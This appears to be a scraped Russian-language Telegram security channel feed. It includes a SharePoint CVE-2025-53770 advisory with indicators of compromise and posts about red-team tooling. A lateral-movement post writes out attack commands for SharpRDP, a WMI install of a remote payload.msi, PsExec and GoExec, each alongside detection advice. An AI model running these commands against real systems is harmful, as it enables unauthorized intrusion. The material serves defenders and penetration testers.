Forwarded from Just Security
Zero-day в SharePoint (CVE‑2025‑53770)
18 июля эксперты Eye Security зафиксировали масштабную атаку на on‑prem SharePoint, включающей цепочку из CVE‑2025‑49706 и CVE‑2025‑49704, теперь уже получившей идентификатор CVE‑2025‑53770. Эксплойт позволяет внедрить web‑shell без авторизации.
• Эксплуатация происходит через POST запрос к
• Сохраняется файл
• Массовое сканирование показало десятки заражённых серверов в первой волне (~18 июля) и второй (~19 июля) .
По данным Eye Security:
• Первая волна: IP
• Вторая волна: IP
Комментарий Microsoft:
Обнаружено активное использование уязвимости. Патч пока отсутствует. SharePoint Online не затронут. Рекомендации: подключить Defender + AMSI‑интеграцию, отключить сервер от Интернета до выхода обновления.
Наш комментарий:
Наши аналитики SOC уже столкнулись с попытками эксплуатации данной уязвимости, необходимо принять следующие меры:
1. Изолируйте все on‑prem SharePoint-серверы.
2. Испольлуйзете Defender + AMSI в SharePoint‑окружение и проведите сканирование.
3. Проверьте IIS‑логи на запросы со следующими метриками:
• POST
• Referer
• GET
4. Сделайте поиск по файлу spinstall0.aspx
5. При обнаружении следов копрометации запустите процесс расследования инцидента.
Источники:
• research.eye.security
• SANS Internet Storm Center
• SecurityWeek
18 июля эксперты Eye Security зафиксировали масштабную атаку на on‑prem SharePoint, включающей цепочку из CVE‑2025‑49706 и CVE‑2025‑49704, теперь уже получившей идентификатор CVE‑2025‑53770. Эксплойт позволяет внедрить web‑shell без авторизации.
• Эксплуатация происходит через POST запрос к
/_layouts/15/ToolPane.aspx с Referer=/_layouts/SignOut.aspx.• Сохраняется файл
spinstall0.aspx - дампер, извлекающий ValidationKey, позволяя создавать псевдо‑валидные ViewState‑токены с помощью ysoserial и получать RCE.• Массовое сканирование показало десятки заражённых серверов в первой волне (~18 июля) и второй (~19 июля) .
По данным Eye Security:
• Первая волна: IP
107.191.58.76 (~18 июля, 18:06 UTC)• Вторая волна: IP
104.238.159.149 (~19 июля, 07:28 UTC)Комментарий Microsoft:
Обнаружено активное использование уязвимости. Патч пока отсутствует. SharePoint Online не затронут. Рекомендации: подключить Defender + AMSI‑интеграцию, отключить сервер от Интернета до выхода обновления.
Наш комментарий:
Наши аналитики SOC уже столкнулись с попытками эксплуатации данной уязвимости, необходимо принять следующие меры:
1. Изолируйте все on‑prem SharePoint-серверы.
2. Испольлуйзете Defender + AMSI в SharePoint‑окружение и проведите сканирование.
3. Проверьте IIS‑логи на запросы со следующими метриками:
• POST
/layouts/15/ToolPane.aspx?DisplayMode• Referer
/layouts/SignOut.aspx• GET
/layouts/15/spinstall0.aspx4. Сделайте поиск по файлу spinstall0.aspx
5. При обнаружении следов копрометации запустите процесс расследования инцидента.
Источники:
• research.eye.security
• SANS Internet Storm Center
• SecurityWeek
Eye Research
SharePoint Under Siege: ToolShell Exploit (CVE-2025-49706 & CVE-2025-49704)
On the evening of July 18, 2025, Eye Security was the first in identifying large-scale exploitation of a new SharePoint remote code execution (RCE) vulnerability chain in the wild. Read how we found it & what we did afterwards.
❤1👍1
GitHub
GitHub - ZephrFish/CVE-2025-53770-Scanner: ToolShell scanner - CVE-2025-53770 and detection information
ToolShell scanner - CVE-2025-53770 and detection information - ZephrFish/CVE-2025-53770-Scanner
A comprehensive security scanner designed to identify SharePoint instances vulnerable
to CVE-2025-53770, which involves a deserialization vulnerability in SharePoint's
ExcelDataSet component that allows remote code execution and machine key extraction
This scanner incorporates real-world attack patterns observed in active exploitation
campaigns and provides detailed confidence scoring based on machine key extraction,
secondary payload deployment, and SharePoint component processing indicators
JSON Output (-o results.json)
[
{
"host": "sharepoint.example.com",
"url": "https://sharepoint.example.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
"scan_time": "2025-07-21T10:30:00.123456",
"vulnerable": true,
"status_code": 200,
"response_size": 15432,
"error": null,
"response_time": 1.23
}
]
#sharepoint #scanner #cve #poc
Please open Telegram to view this post
VIEW IN TELEGRAM
Автор статьи демонстрирует, как искать признаки присутствия злоумышленника (persistence) в Linux с помощью open source инструментов и стандартных средств ОС
Рассмотренные методы сохранения доступа:
▪️ SSH Keys▪️ Crontab▪️ Bashrc▪️ APT▪️ Privileged user & SUID bash▪️ Malicious Systemd▪️ Hunting LKM Rootkits▪️ LD_PRELOAD rootkit▪️ PAM Backdoor▪️ ACL▪️ init.d▪️ Motd▪️ Mount process for hide any pid▪️ Webshells▪️ rc.local
#linux #persistence #threathunting
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5🔥2
Developer-friendly local tool for testing LLM applications
😉 Test your prompts and models with automated evaluations😉 Secure your LLM apps with red teaming and vulnerability scanning😉 Compare models side-by-side😉 Automate checks in CI/CD😉 Share results with your team
#llm #ai
Please open Telegram to view this post
VIEW IN TELEGRAM
codebattle.hexlet.io
Hexlet Codebattle • Game for programmers
Free online game for programmers. No ads, registration from github. Solve Tasks with the bot, friends or random players.
В свое время пользовался Codewars, огромное количество задач различных сложностей
#coder #codewars #coderun #programming
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
Всех причастных с днем! 🥳🥳🥳
Сегодня пятница, всем разрешаю бахнуть пивка, главное холодненького🍺 🍺 🍺
#sysadm
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10
Forwarded from Ralf Hacker Channel (Ralf Hacker)
У SpecterOps очередная крутая статья про сбор данных из ADWS.
https://specterops.io/blog/2025/07/25/make-sure-to-use-soapy-an-operators-guide-to-stealthy-ad-collection-using-adws/
Что еще полезного: как использовать утилиту SoaPy, конвертировать данные в формат BloodHound, ну и конечно как обнаружить этот самый сбор данных домена.
#ad #pentes #redteam #enum #bloodhound #soap
https://specterops.io/blog/2025/07/25/make-sure-to-use-soapy-an-operators-guide-to-stealthy-ad-collection-using-adws/
Что еще полезного: как использовать утилиту SoaPy, конвертировать данные в формат BloodHound, ну и конечно как обнаружить этот самый сбор данных домена.
#ad #pentes #redteam #enum #bloodhound #soap
SpecterOps
Make Sure to Use SOAP(y) - An Operators Guide to Stealthy AD Collection Using ADWS - SpecterOps
Learn how to perform stealthy recon of Active Directory environments over ADWS for Red Team Assessments
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from 1N73LL1G3NC3
NetExec: Enumerate Logged-On Users with the Remote Registry Service
Session enumeration is only possible with admin privileges? That is a problem of the past thanks to the new --reg-sessions core functionality of NetExec. SID values are the registry hives from NTUSER.dat which are loaded/unloaded depending on the user being logged in or not.
Blog: Session Enumeration Through Remote Registry
Session enumeration is only possible with admin privileges? That is a problem of the past thanks to the new --reg-sessions core functionality of NetExec. SID values are the registry hives from NTUSER.dat which are loaded/unloaded depending on the user being logged in or not.
Blog: Session Enumeration Through Remote Registry
👍6❤1🔥1
Инструмент для превращения Chromium браузеров в C2 имплант
#c2 #chromium #chromealone #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from RedBlue Notes
Горизонтальное перемещение: тени в инфраструктуре
Продолжаем говорить про перемещение, сегодня будут интересные утилиты.
Тихий проход через Headless RDP😑
Представьте: вы хотите попасть с одной машины на другую, но не размахивая флагом в логах. Один из элегантных способов — Headless RDP через SharpRDP. Команда:
Вот и вы уже запускаете код на удаленном узле, без графического окна и лишних признаков. Защитникам в таких случаях стоит обращать внимание на неожиданные загрузки mstscax.dll или RDP-трафик без интерактивной сессии.
WMI с MSI: установка, которая не то, чем кажется🤯
Другой и один из любимых методов — WMI с деплоем MSI. С точки зрения системы, это установка пакета, но внутри — полезная нагрузка:
Стороне атаки такой способ дает тишину, стороне защиты — повод мониторить необычные MSI-установки через WMI.
PsExec: громкий, но надежный🍞
Но нельзя обойти стороной и классику — PsExec. Это инструмент, который админы обожают за удобство, а синие команды — за предсказуемые следы. Запуск может выглядеть так:
Быстро, просто… и громко: появляется служба PSEXESVC, фиксируется SMB-трафик, остаются артефакты. Опытный атакующий может переименовать службу, очистить следы или использовать модифицированные версии. Опытный защитник — найдет их по событию 7045, именованным каналам \\.\pipe\psexesvc и подозрительным RPC-запросам.
GoExec: современный шпион👀
Тем, кто ценит тишину, стоит взглянуть на GoExec — современный аналог, умеющий работать через прокси и минимизировать новые артефакты. Он не так распространен, поэтому часто проходит под радаром:
Для атакующего — это способ двигаться в полутьме, для защитника — повод расширить поведенческую аналитику.
Как итог🍩
Весь этот арсенал объединяет простая логика: чем ближе способ к легитимной административной операции, тем сложнее его заметить. Для красных команд это значит — мимикрировать под штатную работу админа. Для синих — изучить эти «будни администратора» так, чтобы любое несоответствие бросалось в глаза.
Если вы дочитали до этого места — значит, вам точно интересна эта кухня. Поддержите статью лайком и подпишитесь на канал — впереди еще больше разборов, техник и историй с обеих сторон.
Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.
Продолжаем говорить про перемещение, сегодня будут интересные утилиты.
Тихий проход через Headless RDP
Представьте: вы хотите попасть с одной машины на другую, но не размахивая флагом в логах. Один из элегантных способов — Headless RDP через SharpRDP. Команда:
SharpRDP.exe computername=DC01 command=calc username=OFFENSE\admin password=Passw0rd
Вот и вы уже запускаете код на удаленном узле, без графического окна и лишних признаков. Защитникам в таких случаях стоит обращать внимание на неожиданные загрузки mstscax.dll или RDP-трафик без интерактивной сессии.
WMI с MSI: установка, которая не то, чем кажется
Другой и один из любимых методов — WMI с деплоем MSI. С точки зрения системы, это установка пакета, но внутри — полезная нагрузка:
Invoke-WmiMethod -Path Win32_Product -Name Install -ArgumentList @($true,"","\\192.168.1.4\share\payload.msi") -ComputerName TARGET -Credential $cred
Стороне атаки такой способ дает тишину, стороне защиты — повод мониторить необычные MSI-установки через WMI.
PsExec: громкий, но надежный
Но нельзя обойти стороной и классику — PsExec. Это инструмент, который админы обожают за удобство, а синие команды — за предсказуемые следы. Запуск может выглядеть так:
PsExec.exe \\TARGET -u Domain\Admin -p P@ssword cmd.exe
Быстро, просто… и громко: появляется служба PSEXESVC, фиксируется SMB-трафик, остаются артефакты. Опытный атакующий может переименовать службу, очистить следы или использовать модифицированные версии. Опытный защитник — найдет их по событию 7045, именованным каналам \\.\pipe\psexesvc и подозрительным RPC-запросам.
GoExec: современный шпион
Тем, кто ценит тишину, стоит взглянуть на GoExec — современный аналог, умеющий работать через прокси и минимизировать новые артефакты. Он не так распространен, поэтому часто проходит под радаром:
goexec --method scmr change --proxy 127.0.0.1:1080 TARGET_IP command.exe
Для атакующего — это способ двигаться в полутьме, для защитника — повод расширить поведенческую аналитику.
Как итог
Весь этот арсенал объединяет простая логика: чем ближе способ к легитимной административной операции, тем сложнее его заметить. Для красных команд это значит — мимикрировать под штатную работу админа. Для синих — изучить эти «будни администратора» так, чтобы любое несоответствие бросалось в глаза.
Если вы дочитали до этого места — значит, вам точно интересна эта кухня. Поддержите статью лайком и подпишитесь на канал — впереди еще больше разборов, техник и историй с обеих сторон.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥3
Нашел очередную, но достойную интерактивную платформу для тренировки работы в командной строке
Здесь и здесь более продвинутый уровень, либо оболочка bash ограничена
Знаете ли вы как можно вывести список всех файлов в директории не использую ls, а сделать это использую только echo ? 😳😁
#linux #cmd #bash
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Три месяца назад было обновление скрипта certipy, а вот теперь вышло обновление и для Certify.
Blog: https://specterops.io/blog/2025/08/11/certify-2-0/
Wiki: https://github.com/GhostPack/Certify/wiki/4-%E2%80%90-Escalation-Techniques
#ad #pentest #redteam #adcs
Blog: https://specterops.io/blog/2025/08/11/certify-2-0/
Wiki: https://github.com/GhostPack/Certify/wiki/4-%E2%80%90-Escalation-Techniques
#ad #pentest #redteam #adcs
SpecterOps
Certify 2.0 - SpecterOps
Certify 2.0 features a suite of new capabilities and usability enhancements. This blogpost introduces changes and features additions.
❤3
Purple Team
Lateral Movement – BitLocker
BitLocker is a full disk encryption feature which was designed to protect data by providing encryption to entire volumes. In Windows endpoints (workstations, laptop devices etc.), BitLocker is typi…
A newly discovered lateral movement technique, revealed through the BitLockMove proof-of-concept, demonstrates how attackers can exploit BitLocker’s Component Object Model (COM) structure to execute malicious code under the context of an interactive user
#bitlocker #wmi #windows #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🤝3